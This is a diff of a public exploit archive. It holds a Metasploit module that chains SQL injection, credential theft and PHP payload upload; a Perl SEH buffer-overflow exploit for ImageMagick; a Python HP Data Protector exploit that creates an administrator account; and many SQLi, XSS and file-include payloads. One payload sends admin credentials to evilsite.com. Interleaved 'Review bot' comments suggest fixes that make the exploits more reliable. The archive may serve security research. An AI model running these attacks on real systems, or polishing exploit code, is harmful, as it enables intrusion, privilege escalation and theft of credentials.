end
def database_get_field(table, column, row)
res = send_request_cgi({
'method' => 'POST',
'uri'=>gateway,
'vars_post' => {
'val' => 'AA==',
'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
}
})
if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=')
return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
end
return false
end
def check
testvalue = rand_text_alpha(9)
res = send_request_cgi({
'method' => 'POST',
'uri'=>gateway,
'vars_post' => {
'val' => 'AA==',
'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1,'" + testvalue + "',3 -- --")
}
})
if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and
Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
payload_name = rand_text_alpha(rand(10) + 5) + '.php'
print_status("#{peer} - Using SQL injection to acquire credentials")
user = database_get_field('users', 'name', 0)
if user == false
print_error("#{peer} - Failed to acquire administrator username")
return
end
password = database_get_field('users', 'password', 0)
if password == false
print_error("#{peer} - Failed to acquire administrator password")
end
print_status("#{peer} - Using #{user}:#{password}")
res = send_request_cgi({
'method' => 'POST',
'uri'=>login,
'vars_post' => {
'submit' => '1',
'username' => user,
'password' => password
}
})
login_cookie = ""
if res and res.headers.has_key?('Location')
login_cookie = res.get_cookies
print_status("#{peer} - Login successful")
else
print_error("#{peer} - Failed to log in")
return
end
data = Rex::MIME::Message.new
data.add_part("MAX_FILE_SIZE", nil, nil, 'form-data; name="MAX_FILE_SIZE"')
data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"")
post_data = data.to_s
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => upload,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => login_cookie,
'data' => post_data
})
if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
path = $1
if target.name =~ /Linux/
path = path.sub! "\\", "/"
end
target_path = normalize_uri(target_uri.path, path)
print_status("#{peer} - Requesting: #{target_path}")
send_request_raw({'uri' => normalize_uri(target_path)})
handler
else
print_error("#{peer} - Failed to upload file")
return
end
end
end
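Review bot: In the Linux branch of exploit, `path = path.sub! "\\", "/"` sets path to nil whenever the returned path contains no backslash, because `String#sub!` returns nil on no match, and `sub!` also replaces only the first separator; `path = path.gsub("\\", "/")` avoids both problems. When `database_get_field('users', 'password', 0)` returns false the method prints an error but continues into the login request with a false password, unlike the username branch just above it, so a `return` belongs after that print_error. Both check and exploit pass the literal `'users'` even though `TARGETDATABASEUSERTABLE` is registered for exactly that purpose; `datastore['TARGETDATABASEUSERTABLE']` should be used in those calls so the option has an effect.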

36
platforms/php/webapps/31350.txt Executable file

@ -0,0 +1,36 @@
# Exploit Title: Control de Citas 1.4 (CIME) - Multiple Vulnerabilities
# Date: 01/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.cgaredes.tk/
# Software Link: http://sourceforge.net/projects/cime/files/latest/download?source=directory
[1] SQL Injection - 'USERNAME' vulnerable to time based attack
P0C: POST REQUEST
POST /cime/citasmedicas.php?pag=citasmedindex HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cime/citasmedicas.php?pag=citasmedindex
Cookie: PHPSESSID=ftkms6mdqi3039r41felgm39s1;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=[SQL INJECTION]&password=pass
[2] XSS Reflected on citasmedicas.php (must be logged)
P0C = http://localhost/cime/citasmedicas.php?pag=[XSS]
##

61
platforms/php/webapps/31515.txt Executable file

@ -0,0 +1,61 @@
# Title: osCommerce v2.x SQL Injection Vulnerability
# Dork: Powered by osCommerce
# Author: Ahmed Aboul-Ela
# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek
# Vendor : http://www.oscommerce.com
# Version: v2.3.3.4 (current latest release) and prior versions should be affected too
# References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability
- Vulnerable Code snippet in "catalog/admin/geo_zones.php":
<?php
[...]
LINE 138: $rows = 0;
LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified,
a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id
left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id";
LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows);
LINE 141: $zones_query = tep_db_query($zones_query_raw);
[...]
?>
As we can see at line 139 the GET zID parameter directly concatenated with the sql query
without any type of sanitization which leads directly to sql injection vulnerability
- Proof of Concept ( dump the admin username and password ):
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --
- Exploitation & Attack Scenario:
an authenticated admin account is required to successfully exploit the vulnerability
but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack
Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]"
We can use hybrid attack technique ( SQL Injection + XSS ) :
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators --
- Mitigation:
The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now
https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902
- Time-Line:
Mon, Feb 3, 2014 at 10:17 PM: vulnerability advisory sent to osCommerce
Tue, Feb 4, 2014 at 01:14 AM: recevied initial reply from osCommerce
Tue, Feb 4, 2014 at 02:06 AM: osCommerce released a quick fix for the vulnerability
Thu, Feb 6, 2014 at 05:15 PM: the public responsible disclosure
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware

28
platforms/php/webapps/31525.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: Extended Useradmininfo MyBB Plugin 1.2.1 - Cross Site
Scripting
# Google Dork: N/A
# Date: 09.02.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage: http://forum.mybboard.de/user-9022.html
# Software Link: http://mods.mybb.com/view/extended-useradmininfo
# Version: 1.2.1
# Tested on: PHP
Description:
This plugin shows advanced Informations about a user, such as last IP, User
Agent, Browser and Operating System. The information will be shown in a
user profile and visible only for people who are able to see the
adminoptions on user profiles.
Proof of Concept
1. Create a user account.
2. Change your user-agent to "Mozilla<script>alert(1)</script>".
3. Login and then... logout.
* The script will be executed whenever the administrator view your profile.
Solution:
Replace the content of "inc/plugins/extendeduseradmininfos.php" with this
fix:
http://pastebin.com/ncQCvwdq

18
platforms/php/webapps/31571.txt Executable file

@ -0,0 +1,18 @@
# Exploit Title: Wordpress plugin Buddypress <= 1.9.1 privilege escalation
# Date: 11/02/2014
# Exploit Author: Pietro Oliva
# Vendor Homepage: http://buddypress.org
# Software Link: http://downloads.wordpress.org/plugin/buddypress.1.9.1.zip
# Version: 1.9.1
# CVE : [CVE-2014-1889]
# Vulnerability patched in version 1.9.2
it is possible to perform a privilege escalation attack due to a lack of
permissions check in the group creation process. A malicious user could
exploit this vulnerability to take control of every group (change name,
description, avatar and settings).
To exploit this vulnerability you have to follow these steps:
1) Create a cookie named bp_new_group_id=<id_of_victim_group>
2) Visit the url http://example.com/groups/create/step/group-details/
3) Enjoy the power


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28898/info
Horde Webmail is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
This issue affects Kronolith 2.1.7. The vulnerable Kronolith versions are included in Horde Groupware 1.0.5 and Horde Groupware Webmail Edition 1.0.6.
http://www.example.com/horde/kronolith/addevent.php?timestamp=1208932200&url=[xss]

10
platforms/php/webapps/31700.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28917/info
e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
e107 0.7.0 is vulnerable; other versions may also be affected.
http://localhost/a/news.php?day."><script>alert("www.z0rlu.ownspace.org")</script>
http://localhost/a/search.php?q="><script>alert("www.z0rlu.ownspace.org")</script>&r=0&s.x=8&s.y=4

10
platforms/php/webapps/31701.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28918/info
Digital Hive is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/a/hive_v2.RC2/base.php?page=membres.php&mt=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28919/info
The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input. This issue permits attackers to upload arbitrary files with '.htm', '.html', or '.txt' extensions.
An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.
Note that to exploit this issue, the attacker may require valid login credentials.
http://www.example.com/phpnuke/upload_category/filename.html


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28920/info
Pixel Motion Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://localhost/a/liste_article.php?jours="><script>alert()</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28922/info
PHCDownload is prone to an SQL-injection and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHCDownload 1.1.0 is vulnerable to these issues; other versions may also be affected.
http://localhost/upload/admin/index.php?hash=-1'/**/union/**/select/**/adminsession_user_id,1,adminsession_hash,adminsession_name,4,5,6,7/**/from/**/phcdl_sessions_admin/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28922/info
PHCDownload is prone to an SQL-injection and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHCDownload 1.1.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/upload/install/index.php?step="><script>alert()</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28942/info
The Visites component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Visites 1.1 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]

11
platforms/php/webapps/31709.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28943/info
Siteman is prone to a local file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this as a cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Or, the attacker may exploit the issue as a local file-include vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Siteman 2.0.x2 is vulnerable; other versions may also be affected.
http://www.example.com/siteman2/index.php?module=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28957/info
miniBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
miniBB 2.2a is vulnerable; other versions may also be affected.
http://www.example.com/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28926/info
IBM Lotus Expeditor is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges.
cai:"%20-launcher%20\\6.6.6.6\d$\trojan


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28946/info
Microsoft Excel is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny access to legitimate users. Given the nature of this vulnerability, attackers may also be able to execute arbitrary code, but this has not been confirmed.
Microsoft Excel 2007 is vulnerable; other versions may also be affected.
<html>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('Yacubian')></OBJECT>
<img>

1480
platforms/windows/local/31524.rb Executable file


107
platforms/windows/local/31688.pl Executable file

@ -0,0 +1,107 @@
#!/usr/bin/perl
########################################################################################
# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)
# Date: 2-13-2014
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)
# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/
# Version Tested: 6.8.8-4
# Tested On: Windows XP SP3
########################################################################################
# Credits:
#
# CVE-2014-1947 published Feb 08 2014
# by Justin Grant
# http://www.securityfocus.com/bid/65478/info
#
########################################################################################
# Overview:
#
# I saw the notice for this CVE today but there was no known published expoits so
# I figured I'd put together this quick POC. Note, all app modules for the tested
# version were compiled with safeSEH so my use of an OS module may require adjustment
# of the offsets. There also appears to be several bad chars that fail the sploit.
# For this POC I only generate a basic messagebox using FatalAppExit(). It may take
# some work to get it to do more.
#
# How it works:
#
# This particular BOF takes advantage of insecure handling of the english.xml file
# which the app uses to display various error messages. I didn't spend much time
# investigating the app so there may be additional vulnerable locations
#
# This script generates two files:
# 1) a malfored .bmp file that will cause ImageMagick to generate a specific
# error when opened (LengthAndFilesizeDoNotMatch), as defined in the
# english.xml file
# 2) a modified english.xml file that replaces the original error message with
# our exploit code
#
# To test this POC:
# 1) run the script, replace the original english.xml file (in App's folder)
# 2) open the .bmp file with ImageMagick
########################################################################################
# file write function
sub write_file {
my ($file, $buffer) = @_;
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";
}
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
my $header = "\x42\x4d"; # BM
$header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
$header = $header . "\x00\x00\x00\x00"; # unused
$header = $header . "\x36\x00\x00\x00"; # bitmap offset
$header = $header . "\x28\x00\x00\x00"; # header size
$header = $header . "\x02\x00\x00\x00"; # width
$header = $header . "\x02\x00\x00\x00"; # height
$header = $header . "\x01\x00"; # num of color planes
$header = $header . "\x18\x00"; # num of bits per pixel
$header = $header . "\x00\x00\x00\x00"; # compression (none)
$header = $header . "\x10\x00\x00\x00"; # image size
$header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
$header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
$header = $header . "\x00\x00\x00\x00"; # colors in palette
$header = $header . "\x00\x00\x00\x00"; #important colors
return $header;
}
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data;
write_file("corrupt.bmp", $buffer);
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button
my $nops = "\x90" x 100;
# this is just a POC shellcode that displays a messagebox using the FatalAppExit function
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
"\x31\xc0" . # xor eax, eax
"\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
"\x51" . # push ecx
"\x50" . # push eax
"\xff\xd3"; # call ebx
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">';
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);
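Review bot: `open(FILE, ">$file")` in write_file ignores the open result, so a failed open still prints to the unopened handle and then reports the file as created; the safer shape is `open(my $fh, '>', $file) or die "Cannot open $file: $!"; binmode $fh;` followed by `print $fh $buffer;` and `close $fh;`, with binmode because both outputs are binary data. The script has no `use strict; use warnings;`, and `my $buffer` is declared twice at file scope (once for the bmp, once for the xml), which warnings would flag as masking the earlier declaration. The comment `# offset to next seh at 568` sits next to `"\x41" x 62504`, so one of the two appears stale and the comment should state the offset the code actually uses.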

123
platforms/windows/remote/31689.py Executable file

@ -0,0 +1,123 @@
import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omniinet service is
running as SYSTEM. This allows for complete compromise of the remote
host.
To exploit this vulnerability, you only need to send two specific arguments.
Omniinet has an argument parser that will extract these out and
eventually pass them to a call to CreateProcessW via the lpCommandLine
parameter.
When a packet is sent to the omniinet service, it will check the opcode
and look up an associated function to call based on the opcode in a table
of function pointers. The function to handle EXEC_BAR packets requires that
the packet contain at least 19 arguments. The 18th argument will be the
command we want to execute, and the 19th will be an argument we can pass to
the command we are executing. This exploit will create a new windows account
and add it to the local Administrators group. This means that lpCommandLine
that gets passed to CreateProcess will need to look like:
'c:\windows\system32\cmd.exe' '/c net user usr p@ss!23 /add'
and
'c:\windows\system32\cmd.exe' '/c net localgroup Administrators usr /add'
Note: The 19th value has size constraints so it needs to be as short of a
string as possible.
"""
exec_bar_add_user = \
"\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x75\x00\x73\x00" + \
"\x72\x00\x20\x00\x70\x00\x40\x00\x73\x00\x73\x00\x21\x00\x32\x00" + \
"\x33\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
exec_bar_make_admin = \
"\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00" + \
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00" + \
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00" + \
"\x72\x00\x73\x00\x20\x00\x75\x00\x73\x00\x72\x00\x20\x00\x2f\x00" + \
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print "[-]ERROR CREATING SOCKET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print "[-]ERROR CONNECTING TO TARGET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock
def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res
cmdline_parser = argparse.ArgumentParser(description='HP Data Protector EXEC_BAR Remote Command Execution')
cmdline_parser.add_argument('-t', dest='ip', help='Target host ip', required=True)
cmdline_parser.add_argument('-p', dest='port', help='Target port', default=5555, type=int, required=False)
args = cmdline_parser.parse_args()
print "\n[*]ATTEMPING TO ADD WINDOWS ADMINISTRATOR ACCOUNT usr WITH PASSWORD p@ss!23"
for packet in [exec_bar_add_user, exec_bar_make_admin]:
target = connect_target(args.ip, args.port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()
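Review bot: The reply parsing `data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1]` raises IndexError whenever the response lacks that marker, including the empty string recv returns on a closed connection, so the loop dies with a traceback and the socket is left open; split first, check the result has two parts before indexing, and otherwise print the raw reply, e.g. `if len(parts) < 2: print "[*]SERVER RESPONSE (unparsed): %r" % data`. In connect_target the socket created before a failed connect is never closed before `return -1`; add `sock.close()` in that except branch. The `err[0], err[1]` indexing relies on Python 2 socket.error being tuple-like, which matches the rest of the file (print statements) but would need `err.errno` and `err.strerror` under Python 3. Wrapping the send/recv in try/finally would also guarantee `target.close()` runs when parsing fails.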


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28907/info
RSA Authentication Agent for Web is prone to a remote URI-redirection vulnerability because the application fails to adequately sanitize user-supplied input.
A successful attack may aid in phishing-style attacks.
This issue affects RSA Authentication Agent for Web for Internet Information Services 5.3.0.258. Other versions may also be affected.
https://www.example.com/WebID/IISWebAgentIF.dll?Redirect?url=ftp://www.example2.com/index.htm